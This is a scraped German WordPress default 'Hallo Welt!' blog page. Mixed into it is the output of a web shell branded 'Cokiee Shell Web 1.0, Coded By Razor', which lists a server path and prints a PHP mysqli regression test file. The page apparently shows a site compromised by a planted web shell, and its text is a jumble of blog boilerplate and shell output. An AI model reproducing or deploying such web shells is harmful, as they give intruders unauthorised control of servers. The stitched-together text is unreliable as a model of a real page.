Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/mysqli/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/mysqli/tests/bug38003.phpt |
--TEST-- Bug #38003 (in classes inherited from MySQLi it's possible to call private constructors from invalid context) --SKIPIF-- <?php if (!extension_loaded("mysqli")) print "skip"; ?> --FILE-- <?php class DB extends mysqli { private function __construct($hostname, $username, $password, $database) { var_dump("DB::__construct() called"); } } $DB = new DB(); echo "Done\n"; ?> --EXPECTF-- Fatal error: Access level to DB::__construct() must be public (as in class mysqli) in %s%ebug38003.php on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare